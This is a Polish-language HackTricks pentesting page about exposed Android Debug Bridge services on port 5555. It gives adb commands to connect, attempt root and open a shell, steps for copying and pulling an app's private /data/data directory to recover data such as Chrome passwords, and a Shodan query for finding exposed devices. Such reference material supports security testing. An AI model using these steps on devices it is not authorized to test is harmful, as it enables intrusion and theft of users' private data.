5555 - Android Debug Bridge

Reading time: 2 minutes

tip

Ucz się i ćwicz AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Wsparcie HackTricks

Podstawowe informacje

Z dokumentacji:

Android Debug Bridge (adb) to wszechstronne narzędzie wiersza poleceń, które pozwala na komunikację z urządzeniem. Polecenie adb ułatwia różnorodne działania na urządzeniu, takie jak instalowanie i debugowanie aplikacji, a także zapewnia dostęp do powłoki Unix, której można używać do uruchamiania różnych poleceń na urządzeniu.

Domyślny port: 5555.

PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)

Połączenie

Jeśli znajdziesz usługę ADB działającą na porcie urządzenia i możesz się z nią połączyć, możesz uzyskać powłokę wewnątrz systemu:

bash
adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell

Aby uzyskać więcej poleceń ADB, sprawdź następującą stronę:

{{#ref}} ../mobile-pentesting/android-app-pentesting/adb-commands.md {{#endref}}

Zrzut danych aplikacji

Aby całkowicie pobrać dane aplikacji, możesz:

bash
# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"

Możesz użyć tego triku, aby odzyskać wrażliwe informacje, takie jak hasła do Chrome. Aby uzyskać więcej informacji na ten temat, sprawdź informacje w podanych odniesieniach tutaj.

Shodan

  • android debug bridge

tip

Ucz się i ćwicz AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Wsparcie HackTricks